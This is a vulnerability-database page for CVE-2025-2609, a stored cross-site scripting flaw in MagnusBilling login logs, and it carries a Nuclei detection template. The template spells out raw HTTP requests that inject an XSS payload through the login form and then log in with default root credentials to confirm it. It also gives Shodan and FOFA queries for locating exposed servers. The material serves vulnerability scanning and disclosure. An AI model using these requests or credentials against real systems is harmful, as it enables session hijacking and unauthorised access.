| Reporter | Title | Published | Views | Family All 9 |
|---|---|---|---|---|
| CVE-2025-2609 | 21 Mar 202523:19 | โ | circl | |
| MagnusBilling ๅฎๅ จๆผๆด | 21 Mar 202500:00 | โ | cnnvd | |
| CVE-2025-2609 | 21 Mar 202522:41 | โ | cve | |
| CVE-2025-2609 MagnusBilling Stored Cross-Site Scripting in Login Logs | 21 Mar 202522:41 | โ | cvelist | |
| EUVD-2025-7200 | 3 Oct 202520:07 | โ | euvd | |
| CVE-2025-2609 | 21 Mar 202523:15 | โ | nvd | |
| CVE-2025-2609 | 23 Mar 202523:14 | โ | redhatcve | |
| VulnCheck KEV: CVE-2025-2609 | 21 Mar 202500:00 | โ | vulncheck_kev | |
| CVE-2025-2609 MagnusBilling Stored Cross-Site Scripting in Login Logs | 21 Mar 202522:41 | โ | vulnrichment |
id: CVE-2025-2609
info:
name: MagnusBilling Login Logs - Cross-Site Scripting
author: DhiyaneshDK
severity: high
description: |
Improper neutralization of input during web page generation vulnerability in MagnusSolution MagnusBilling login logging allows unauthenticated users to store HTML content in the viewable log component accessible at /mbilling/index.php/logUsers/read" cross-site scripting This vulnerability is associated with program files protected/components/MagnusLog.Php.This issue affects MagnusBilling- through 7.3.0.
impact: |
Unauthenticated attackers can inject malicious HTML and JavaScript into login logs that persist and execute when administrators view the log component, potentially leading to session hijacking and privilege escalation.
remediation: |
Upgrade to MagnusBilling version 7.3.1 or later that properly sanitizes input in the login logging component.
reference:
- https://vulncheck.com/advisories/magnusbilling-logs-xss
- https://chocapikk.com/posts/2025/magnusbilling/
- https://nvd.nist.gov/vuln/detail/CVE-2025-2609
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N
cvss-score: 8.2
cve-id: CVE-2025-2609
cwe-id: CWE-79
epss-score: 0.01098
epss-percentile: 0.61623
cpe: cpe:2.3:a:magnussolution:magnusbilling:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 4
vendor: magnussolution
product: magnusbilling
shodan-query: html:"MagnusBilling"
fofa-query: body="MagnusBilling"
tags: cve,cve2025,mbilling,stored,xss,authenticated,vkev,vuln
flow: http(1) && http(2) && http(3) && http(4)
variables:
username: "root"
password: "9F4CA770B638615AC5C3E0D2DA16B77C80C2F2C6" # magnus
http:
- raw:
- |
POST /mbilling/index.php/authentication/login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
user=<img src=x onerror=alert(document.domain)>&password=random
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "combination is invalid")'
- '!contains(body, "Trying SQL inject")'
condition: and
internal: true
- raw:
- |
POST /mbilling/index.php/authentication/login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded;
user={{username}}&password={{password}}&key=
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "success")'
condition: and
internal: true
- raw:
- |
GET /mbilling/index.php/authentication/check?_dc= HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "id_agent")'
condition: and
internal: true
- raw:
- |
GET /mbilling/index.php/logUsers/read?_dc=&page=1&start=0&limit=25 HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "User: <img src=x onerror=alert(document.domain)>")'
condition: and
# digest: 4b0a0048304602210081b0d729337bc89eeaf210d1bd4916e71d8469e06695b504a8ecff64f22795e4022100ea352acf12ceeedd8ff814a2fbdf3c08548a2a50a52e6b036f615b79136b90fb:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation withย Vulners data
Weย provide theย essential building blocks forย cybersecurity solutions withย comprehensive, structured, andย constantly updated vulnerability andย exploits data
Api
Power your application withย Vulners API
The Vulners REST API offers reliable, high-performance access toย vulnerabilityย intelligence, withย 99.9%ย SLAย uptime andย CDN-backed data delivery forย seamlessย global access
App
Assess and manage vulnerabilities withย Vulnersย tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation